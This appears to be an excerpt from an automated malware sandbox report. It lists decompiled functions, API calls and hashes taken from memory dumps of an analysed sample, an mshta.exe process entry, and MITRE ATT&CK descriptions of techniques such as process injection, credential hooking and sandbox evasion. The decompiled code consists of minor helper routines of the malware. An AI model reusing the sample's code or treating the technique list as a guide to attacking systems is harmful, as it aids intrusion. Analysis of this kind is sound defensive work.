Part of subcall function 054233F0: memcpy.NTDLL(?,?,?,00000000,00000000,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 05423456
Part of subcall function 054233F0: memcpy.NTDLL(00000000,?,?), ref: 054234B5

memcpy.NTDLL(?,00000000,?,?,05425769,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 054259D7
memcpy.NTDLL(00000018,00000000,00000018,?,05425769,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 05425A23
memset.NTDLL ref: 05425B2A

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AddressProcmemcpy$HandleModulememset
String ID:
API String ID: 2847270571-0
Opcode ID: 51ea3e4b3d6d88bc6fd8b6ee1440ed1da85f07f9066377672eff8aa024fbb381
Instruction ID: 46deace2b8ff600097aa094b18648f85574bf4f313b7c904a77a9e03494097ad
Opcode Fuzzy Hash: 51ea3e4b3d6d88bc6fd8b6ee1440ed1da85f07f9066377672eff8aa024fbb381
Instruction Fuzzy Hash: 3A912A71A0022AEFCF10DF99C985BEEBBF5FF04304F5444AAE811AB250D770AA55DB91

Uniqueness

Uniqueness Score: -1.00%

Function 05417740, Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0541779E
CloseHandle.KERNEL32(?,?,00000010,?,?,00000000,?,00000000), ref: 054177E9
HeapFree.KERNEL32(00000000,000000FF,000000FF,00000094,00000000,05402AFB,00000000,?,0541EDBF,00000000,?,05410E4F,00000000,?,05414397,00000000), ref: 05417AF4
GetLastError.KERNEL32(00000000,?,00000000), ref: 05417D01

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CloseErrorFreeHandleHeapLastmemset
String ID:
API String ID: 2333114656-0
Opcode ID: 8bf74883997628ed5cc5cb3aaaa2747e2fb50549b74f066e1aff102d2dc22cbe
Instruction ID: afd32638f1db59e2d2f12ae148d978cbf0aafba0bf43d9296cb0bee50816b914
Opcode Fuzzy Hash: 8bf74883997628ed5cc5cb3aaaa2747e2fb50549b74f066e1aff102d2dc22cbe
Instruction Fuzzy Hash: F741FA31344218BADB31AE719C44FFF3A3AFB85780F20046BFD06911C1EA718952976E

Uniqueness

Uniqueness Score: -1.00%

Function 05408FBD, Relevance: 5.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 05408FE3
memcpy.NTDLL ref: 0540900B

Part of subcall function 05408F6D: RtlNtStatusToDosError.NTDLL(00000000), ref: 05408FA5
Part of subcall function 05408F6D: SetLastError.KERNEL32(00000000), ref: 05408FAC

GetLastError.KERNEL32(00000010,00000218,054272FD,00000100,?,00000318,00000008), ref: 05409022
GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,054272FD,00000100), ref: 05409105

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Error$Last$Statusmemcpymemset
String ID:
API String ID: 1706616652-0
Opcode ID: e55ffc8707ef48e09b49d4b405da59816dc703b465f6513fc7e2fe8a19d565e9
Instruction ID: b95f34a57fe33a4bb216634e80591b9e4a7236cf85402512be7cc2824a7fff45
Opcode Fuzzy Hash: e55ffc8707ef48e09b49d4b405da59816dc703b465f6513fc7e2fe8a19d565e9
Instruction Fuzzy Hash: 2D416DB1644305AFD720DF25CC45FEBBBE9BB88310F10892EF999C6291E771D5148B62

Uniqueness

Uniqueness Score: -1.00%

Function 0541FDE0, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 05419390: lstrlen.KERNEL32(00000000,?,?,00000000,77A04620,?,00000001,00000001,?,0541EA2B,?,?,?,?,?,00000000), ref: 054193E9
Part of subcall function 05419390: lstrlen.KERNEL32(?,?,?,00000000,77A04620,?,00000001,00000001,?,0541EA2B,?,?,?,?,?,00000000), ref: 05419407
Part of subcall function 05419390: RtlAllocateHeap.NTDLL(00000000,75146985,?), ref: 05419430
Part of subcall function 05419390: memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,0541EA2B,?,?,?,?,?,00000000), ref: 05419447
Part of subcall function 05419390: HeapFree.KERNEL32(00000000,00000000), ref: 0541945A
Part of subcall function 05419390: memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,0541EA2B,?,?,?,?,?,00000000), ref: 05419469

GetLastError.KERNEL32 ref: 0541FE7F

Part of subcall function 05408616: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 054086D0
Part of subcall function 05408616: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 054086F0
Part of subcall function 05408616: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 054086FC

HeapFree.KERNEL32(00000000,?), ref: 0541FE9B
HeapFree.KERNEL32(00000000,?), ref: 0541FEAC
SetLastError.KERNEL32(00000000), ref: 0541FEAF

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
String ID:
API String ID: 2451549186-0
Opcode ID: c0016c3a1c25f12ae874eb79b005e37a9333a78b34ec32def5b027e0e8c64f13
Instruction ID: 4df1d4c63983cbed2655c4e0be22a3fba5816096fbe087d469f10917a40277a6
Opcode Fuzzy Hash: c0016c3a1c25f12ae874eb79b005e37a9333a78b34ec32def5b027e0e8c64f13
Instruction Fuzzy Hash: AF314A31900218FFCF129F99DC458DEBFB5FF48750B51415AF916A2261C7318A62DFA8

Uniqueness

Uniqueness Score: -1.00%

Function 054139BE, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0541E9CA: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,054139F4,?,?,?,?), ref: 0541E9EE
Part of subcall function 0541E9CA: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0541EA00
Part of subcall function 0541E9CA: wcstombs.NTDLL ref: 0541EA0E
Part of subcall function 0541E9CA: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,054139F4,?,?,?), ref: 0541EA32
Part of subcall function 0541E9CA: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0541EA47
Part of subcall function 0541E9CA: mbstowcs.NTDLL ref: 0541EA54
Part of subcall function 0541E9CA: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,054139F4,?,?,?,?,?), ref: 0541EA66
Part of subcall function 0541E9CA: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,054139F4,?,?,?,?,?), ref: 0541EA80

GetLastError.KERNEL32 ref: 05413A5D

Part of subcall function 05408616: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 054086D0
Part of subcall function 05408616: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 054086F0
Part of subcall function 05408616: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 054086FC

HeapFree.KERNEL32(00000000,?), ref: 05413A79
HeapFree.KERNEL32(00000000,?), ref: 05413A8A
SetLastError.KERNEL32(00000000), ref: 05413A8D

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
String ID:
API String ID: 3867366388-0
Opcode ID: 7158e620c42b929037fb367b7cd6ee1e25e6f081e4ae663dca883ed9d3acf82d
Instruction ID: 7a81a12670b6cf74244b8901d98aff1b43fe45a5f88ca9a3b41cfef1bfada2ab
Opcode Fuzzy Hash: 7158e620c42b929037fb367b7cd6ee1e25e6f081e4ae663dca883ed9d3acf82d
Instruction Fuzzy Hash: 41317A32900118EFCF129FA9DC458DEBFB9FF48750B05459BF916A2260C7318A61DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 054024A8, Relevance: 5.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 054024F3
memset.NTDLL ref: 0540250A
memset.NTDLL ref: 05402521
memset.NTDLL ref: 05402539

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: f0a5c41902430c762400147ab188cec92edb7f265558bf3c223a52284d3ed656
Instruction ID: 5eb09999f734a0a153dcf7280dc7cffc75e9ea90cd2529888d07c806158732cb
Opcode Fuzzy Hash: f0a5c41902430c762400147ab188cec92edb7f265558bf3c223a52284d3ed656
Instruction Fuzzy Hash: 6421D476204909BFCB20AF61DC889A67B3AFF08304B10156AF946969D1D372F5B1CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 05423252, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(054160B5,00000008,054160B5,00000000,?,?,054032DF,054160B5,054160B5,00000000,00000008,0000EA60,00000000,?,?,05420742), ref: 0542325E

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

Part of subcall function 05426A07: StrChrA.SHLWAPI(75145520,0000002F,00000000,054160B5,0542328C,054160B5,00000001,00000001,?,?,054032DF,054160B5,054160B5,00000000,00000008,0000EA60), ref: 05426A15
Part of subcall function 05426A07: StrChrA.SHLWAPI(75145520,0000003F,?,?,054032DF,054160B5,054160B5,00000000,00000008,0000EA60,00000000,?,?,05420742,00000008,?), ref: 05426A1F

memcpy.NTDLL(00000000,054160B5,054160B5,054160B5,00000001,00000001,?,?,054032DF,054160B5,054160B5,00000000,00000008,0000EA60,00000000), ref: 054232BC
lstrcpy.KERNEL32(00000000,00000000), ref: 054232CC
lstrcpy.KERNEL32(00000000,054160B5), ref: 054232D8

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: de539eac4caf50a6134158c61240aee58093bddcdeba79c704818a997f00c0d3
Instruction ID: 39e720fd8076f50630980699601643523065d83d6fea8072991b76eb1e8fef0c
Opcode Fuzzy Hash: de539eac4caf50a6134158c61240aee58093bddcdeba79c704818a997f00c0d3
Instruction Fuzzy Hash: 6B21E472604279AFCB159F69C848FEF7FF9AF46280B458056F805AB201DB74D900CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 027746EF, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E027746EF(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E027775C4(_t2);
				if(_t34 != 0) {
					_t30 = E027775C4(_t28);
					if(_t30 == 0) {
						E02774C31(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0277A97B(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0277A97B(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x027746ef
0x027746f9
0x027746fb
0x02774701
0x02774701
0x0277470a
0x0277470e
0x0277471a
0x0277471e
0x02774792
0x02774720
0x02774720
0x02774724
0x0277472b
0x0277472e
0x02774748
0x02774737
0x02774737
0x0277473b
0x0277473e
0x02774743
0x02774743
0x0277474d
0x02774775
0x0277477b
0x0277477e
0x0277474f
0x02774751
0x02774759
0x02774764
0x02774769
0x02774769
0x02774785
0x0277478c
0x0277478d
0x0277478d
0x0277471e
0x0277479d

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,02778390,00000000,00000000,00000000,04F39698,?,?,02774680,?,04F39698), ref: 027746FB

Part of subcall function 027775C4: RtlAllocateHeap.NTDLL(00000000,00000000,02775068), ref: 027775D0

Part of subcall function 0277A97B: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02774729,00000000,00000001,00000001,?,?,02778390,00000000,00000000,00000000,04F39698), ref: 0277A989
Part of subcall function 0277A97B: StrChrA.SHLWAPI(?,0000003F,?,?,02778390,00000000,00000000,00000000,04F39698,?,?,02774680,?,04F39698,0000EA60,?), ref: 0277A993

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02778390,00000000,00000000,00000000,04F39698,?,?,02774680), ref: 02774759
lstrcpy.KERNEL32(00000000,00000000), ref: 02774769
lstrcpy.KERNEL32(00000000,00000000), ref: 02774775

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: ae4da5558bdc936a984616aec0e396830a5d270fc028bbe2a4024e647bb976ac
Instruction ID: 55666558a02d1104ab122828fb846e9d6e49a6101cf1b08514d8404654585857
Opcode Fuzzy Hash: ae4da5558bdc936a984616aec0e396830a5d270fc028bbe2a4024e647bb976ac
Instruction Fuzzy Hash: FF216D7650025AABCF129F68CC98AAEBFB9AF06394F058055E905AB201D735C910CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 054011C6, Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 054011FA
memset.NTDLL ref: 05401211
memset.NTDLL ref: 05401228
memset.NTDLL ref: 05401240

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: cb14364bb629ca351bba5af9f80805692d4fcf12654b6ed8775af6b11317332d
Instruction ID: aa144b4cceec3dd1dff996dde7d6ca28b55ba036a2d9cc3e4bcd4c6ac87cab4e
Opcode Fuzzy Hash: cb14364bb629ca351bba5af9f80805692d4fcf12654b6ed8775af6b11317332d
Instruction Fuzzy Hash: 0311E77260050DBFCB106F92DC84EE67728FF09304B10222EFA46A5980D372B5B1DBD5

Uniqueness

Uniqueness Score: -1.00%

Function 02777AC8, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02777AC8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E027775C4(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x02777add
0x02777ae1
0x02777aeb
0x02777af2
0x02777af5
0x02777af7
0x02777aff
0x02777b04
0x02777b12
0x02777b17
0x02777b21

APIs

lstrlenW.KERNEL32(004F0053,75145520,?,00000008,04F3931C,?,02774CC5,004F0053,04F3931C,?,?,?,?,?,?,02773858), ref: 02777AD8
lstrlenW.KERNEL32(02774CC5,?,02774CC5,004F0053,04F3931C,?,?,?,?,?,?,02773858), ref: 02777ADF

Part of subcall function 027775C4: RtlAllocateHeap.NTDLL(00000000,00000000,02775068), ref: 027775D0

memcpy.NTDLL(00000000,004F0053,751469A0,?,?,02774CC5,004F0053,04F3931C,?,?,?,?,?,?,02773858), ref: 02777AFF
memcpy.NTDLL(751469A0,02774CC5,00000002,00000000,004F0053,751469A0,?,?,02774CC5,004F0053,04F3931C), ref: 02777B12

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 25b89c2f004013c31396205b5f065970fe2105f5836165a9368f5237619c4d6e
Instruction ID: e05d5204b10ed47fbac3933afd6f962f19b17e80db3c39d8f65e24232e48285c
Opcode Fuzzy Hash: 25b89c2f004013c31396205b5f065970fe2105f5836165a9368f5237619c4d6e
Instruction Fuzzy Hash: FBF0F976901118BBCF12EFA9CC88C9EBBADEF093547558466ED08D7211E731EA149BA0

Uniqueness

Uniqueness Score: -1.00%

Function 027774AF, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(04F3887A,00000000,00000000,00000000,02776CA0,00000000), ref: 027774BF
lstrlen.KERNEL32(?), ref: 027774C7

Part of subcall function 027775C4: RtlAllocateHeap.NTDLL(00000000,00000000,02775068), ref: 027775D0

lstrcpy.KERNEL32(00000000,04F3887A), ref: 027774DB
lstrcat.KERNEL32(00000000,?), ref: 027774E6

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: bec837b08bf1140f3dc990b7211f68f7a4a0874fb42ebc4af467bb6611f0fef1
Instruction ID: 4e6898bfae965d9e9eb177d8f932d89e0cc12eb06a10a9eeaddb4161ffe7a075
Opcode Fuzzy Hash: bec837b08bf1140f3dc990b7211f68f7a4a0874fb42ebc4af467bb6611f0fef1
Instruction Fuzzy Hash: 2CE09273E01221A78B229BE4AC48C9FFBADEF8D621304881BF600D3100C730C829CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 05407238, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000000,0540AA96,00000000,\Vars,Software\AppDataLow\Software\Microsoft\,00000000,?,00000000,00000000), ref: 05407244
lstrlen.KERNEL32(?), ref: 0540724C

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

lstrcpy.KERNEL32(00000000,?), ref: 05407263
lstrcat.KERNEL32(00000000,?), ref: 0540726E

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: bf16a0e2c9dfc815e0ab37e83c80ac231b111586ca778ebe2d87afa25ecc0e59
Instruction ID: 45d1657a66f7f3a27a1bfde0cf7680abe7c1ab18b9191373be8da999758ecd99
Opcode Fuzzy Hash: bf16a0e2c9dfc815e0ab37e83c80ac231b111586ca778ebe2d87afa25ecc0e59
Instruction Fuzzy Hash: 99E01233515735AF87226B649C08CCFBFA9FF89220745491AF554E3110CB31D815CB92

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exe PID: 4676 Parent PID: 3472 mshta.exeCOMMON

Executed Functions

Function 000001B972D10FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000003.358520512.000001B972D10000.00000010.00000001.sdmp, Offset: 000001B972D10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 2983361fc99d8c081aa4c72abb1d518230468cfd0ef39711cbd6c2e5cff95858
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 969002144B540655D41421910C4669C7080A389291FE544C0691A90584DA4D029B16A2

Uniqueness

Uniqueness Score: -1.00%

Function 000001B972D10FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000003.358520512.000001B972D10000.00000010.00000001.sdmp, Offset: 000001B972D10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 2983361fc99d8c081aa4c72abb1d518230468cfd0ef39711cbd6c2e5cff95858
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 969002144B540655D41421910C4669C7080A389291FE544C0691A90584DA4D029B16A2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
